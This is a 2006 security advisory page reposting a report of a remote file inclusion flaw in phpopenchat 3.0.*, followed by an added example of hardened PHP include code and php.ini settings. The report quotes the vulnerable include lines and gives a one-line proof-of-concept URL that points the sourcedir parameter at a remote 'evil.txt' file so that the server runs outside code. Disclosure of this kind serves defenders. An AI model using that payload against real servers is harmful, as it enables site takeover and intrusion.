Information Security



Additional information

  Daily summary of bugs in Web applications (PHP, ASP, JSP, CGI, Perl)

  [SA21787] Attachment Mod Attachment Script Insertion Vulnerability

  [SA21789] PhpLeague "id_joueur" SQL Injection Vulnerability

  SL_Site <= 1.0 [spaw_root] Remote File Include Vulnerability

  PayProCart <= 1146078425 Multiple Remote File Include Vulnerabilities

From: stormhacker_(at)_hotmail.com <stormhacker_(at)_hotmail.com>
Date: September 7, 2006
Subject: WDT :-phpopenchat-3.0.* ($sourcedir) Remote File Inclusion Exploit

[W]orld [D]efacers Team
--------------------Summary----------------

eVuln ID: WD23

Vendor:  phpopenchat-3.0.*

Vendor's Web Site: http://phpopenchat.org

Class: Remote

PoC/Exploit: Available

Solution: Not Available

Discovered by: rUnViRuS ( wdzone.net & worlddefacers.de )

-----------------Description---------------

include_once("QueryString.php");
include_once("Settings.php");
include_once("$sourcedir/Subs.php");
include_once("$sourcedir/Errors.php");
include_once("$sourcedir/Load.php");
//include_once("$sourcedir/Security.php");

--------------PoC/Exploit----------------------

http://www.host.com/phpopenchat/contrib/yabbse/poc.php?sourcedir=http://host/evil.txt?

--------------Solution---------------------

No Patch available.

--------------Credit-----------------------

Discovered by: rUnViRuS (worlddefacers.de)
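
The include block quoted under Description builds its paths from $sourcedir, and the PoC supplies that variable as a request parameter. The following is an added example of a hardened form of that block; it is not code from the advisory or from phpopenchat. The "Sources" directory name, the ALLOWED_SOURCES constant and the resolve_source() helper are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Added example, not phpopenchat code. Assumption: the library files sit in a
// "Sources" directory beside this script (hypothetical layout).
const ALLOWED_SOURCES = ['Subs.php', 'Errors.php', 'Load.php'];

/** Resolve an allow-listed library file inside $baseDir, or return null. */
function resolve_source(string $baseDir, string $file): ?string
{
    // realpath() resolves local filesystem paths only, so a URL or a
    // missing directory yields false.
    $base = realpath($baseDir);
    if ($base === false || !is_dir($base)) {
        return null;
    }
    // Exact-match allow-list: no separators, "..", or caller-chosen names.
    if (!in_array($file, ALLOWED_SOURCES, true)) {
        return null;
    }
    $path = realpath($base . DIRECTORY_SEPARATOR . $file);
    // Reject missing files and symlinks that lead outside the base directory.
    if ($path === false || dirname($path) !== $base) {
        return null;
    }
    return $path;
}

// The base directory is fixed in code. It is never read from $_GET, $_POST,
// $_COOKIE, or a global that register_globals could populate.
$sourcedir = __DIR__ . '/Sources';

foreach (ALLOWED_SOURCES as $lib) {
    $path = resolve_source($sourcedir, $lib);
    if ($path === null) {
        http_response_code(500);
        exit("Refusing to load $lib");
    }
    include_once $path;
}
```

As defence in depth, keep allow_url_include = Off in php.ini (the directive exists since PHP 5.2.0), and on PHP versions older than 5.4 keep register_globals = Off.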

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 


